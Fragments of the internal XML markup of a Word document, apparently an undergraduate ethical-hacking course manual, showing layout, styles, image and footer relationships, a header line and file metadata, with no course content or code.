                          <a:path extrusionOk="0" h="273050" w="2339340">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="273050"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="2339340" y="273050"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="23393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9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886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widowControl w:val="1"/>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4513"/>
        <w:tab w:val="right" w:leader="none" w:pos="9026"/>
      </w:tabs>
      <w:jc w:val="both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-581024</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>114300</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7381875" cy="9701943"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="918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842450" y="814150"/>
                        <a:ext cx="2610600" cy="37554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-581024</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>114300</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7381875" cy="9701943"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="918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81875" cy="970194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0">
    <w:pPr>
      <w:widowControl w:val="1"/>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4513"/>
        <w:tab w:val="right" w:leader="none" w:pos="9026"/>
      </w:tabs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TY BSC CS NEP 2020 SEM V</w:t>
      <w:tab/>
      <w:t xml:space="preserve">                                 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ETHICAL HACKING</w:t>
      <w:tab/>
      <w:t xml:space="preserve">    </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">263</w:t>
    </w:r>
  </w:p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Roman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="72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22" w:right="3507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21" w:right="3507"/>
      <w:jc w:val="center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sid w:val="00E643D1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E643D1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableParagraph" w:customStyle="1">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00E643D1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00AE4A5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E4A5C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AE4A5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4A5C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59"/>
    <w:rsid w:val="00F43ECE"/>
    <w:pPr>
      <w:widowControl w:val="1"/>
      <w:autoSpaceDE w:val="1"/>
      <w:autoSpaceDN w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia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1"/>
    <w:rsid w:val="00947564"/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947564"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Times New Roman" w:hAnsi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913F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913FB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5.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer10.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.jpg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="foot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restashop.com/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpg"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.jpg"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.jpg"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.jpg"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpg"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.jpg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpg"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer8.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.prestashop.com/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.prestashop.com/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpg"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer7.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.jpg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.jpg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.jpg"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpg"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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footer10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mRP4BZKvXjCnIsK3MhLjuIAzw==">CgMxLjAyDmgudW03OG5rNWNnZW92OAByITFvazEyVWhPc0Zmc0NnMDFDb2hCcUphYzVjV0Y2NFNURA==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2019-11-20T14:17:00Z</dcterms:created>
  <dc:creator>Saurabh Lahoti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2017-12-05T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>